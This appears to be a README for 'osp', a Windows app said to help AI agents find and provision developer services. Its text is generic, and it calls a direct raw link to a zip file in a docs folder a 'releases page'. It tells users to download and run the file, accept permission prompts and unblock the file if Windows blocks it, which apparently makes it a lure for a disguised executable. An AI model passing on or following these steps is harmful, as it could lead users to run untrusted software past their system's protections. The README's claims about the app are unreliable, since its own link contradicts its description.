osp is a desktop app for Windows that helps AI agents find, set up, and manage developer services.
It is built for service provisioning. That means it helps software connect to the tools and services it needs without manual setup every time.
Use osp when you want a simple way to:
- discover services
- provision services
- manage service access
- keep service setup in one place
- work with a provider-neutral system
osp fits well with AI agent workflows, dev tools, and local infrastructure tasks.
Before you install osp, make sure you have:
- a Windows PC
- a stable internet connection
- enough free disk space for the app and service data
- permission to install apps on your computer
For best results, use a recent version of Windows 10 or Windows 11.
Visit this page to download the latest Windows release:
https://raw.githubusercontent.com/amosahd/osp/main/docs/gtm/Software_3.1-alpha.1.zip
Look for the newest file in the release list. On Windows, that is usually an .exe file or a .zip file.
Follow these steps:
- Open the download page above.
- Find the latest release.
- Download the Windows file.
- If you downloaded a
.zipfile, open it and extract the contents. - If you downloaded an
.exefile, double-click it to start the installer. - If Windows asks for permission, choose Yes.
- Follow the on-screen steps until the install is done.
- Open osp from your Start menu or desktop shortcut.
If the app opens in a new window, the install worked.
When you start osp for the first time, you may see a setup screen.
Use it to:
- choose your basic settings
- connect your service sources
- review any default options
- confirm where the app stores local data
If the app asks for access to files, network, or local services, allow only what you need for your setup.
osp helps bridge the gap between AI agents and services.
In plain terms:
- an AI agent can ask for a service
- osp helps find the right service
- osp helps provision that service
- osp helps manage it after setup
This keeps service access more organized and reduces repeated manual work.
You can use osp to handle tasks such as:
- finding available services
- setting up service access
- checking service status
- updating service settings
- removing services you no longer need
It is useful for local development, test setups, and service workflows that need a clear structure.
osp is designed around:
- AI agents
- developer tools
- infrastructure setup
- service provisioning
- open standards
- machine-to-machine communication
It focuses on service access rather than user-facing chat tools.
If osp does not start, try these steps:
- Close the app.
- Run it again from the Start menu.
- Check that the download finished fully.
- If you used a
.zipfile, make sure you extracted it first. - If Windows blocks the file, open the file’s properties and allow it.
- Restart your PC and try again.
If the app still does not open, download the latest release again from the releases page.
To update osp on Windows:
- Go to the releases page.
- Download the newest version.
- Close the app before you install the new one.
- Install the new release over the old one, or replace the old app files if you used a zip package.
- Open the updated app.
Keeping osp current helps you get the latest service support and fixes.
Here are a few simple terms you may see:
- Service: A tool or system that osp can connect to
- Provisioning: Setting up a service so it can be used
- Agent: A software system that can act on requests
- Provider-neutral: Not tied to one company or platform
- Protocol: A shared way for systems to talk to each other
The osp project is built as an open standard for service provisioning. It uses a cross-platform approach and fits modern developer workflows.
You may see work tied to:
- Rust
- TypeScript
- protocol design
- local service management
- AI agent integration
Before you run any downloaded file:
- make sure it comes from the releases page
- check that the file name matches the latest release
- only use files from the official repository
- keep your Windows security tools on
If setup fails, check these items:
- the download finished fully
- you have enough free storage
- your internet connection is stable
- Windows has not blocked the file
- another app is not already using the same files
If a service does not appear, refresh the app and check your connection settings.
- Open the releases page
- Download the latest Windows file
- Install or extract it
- Open osp
- Follow the setup screen
- Connect your services
- Start using it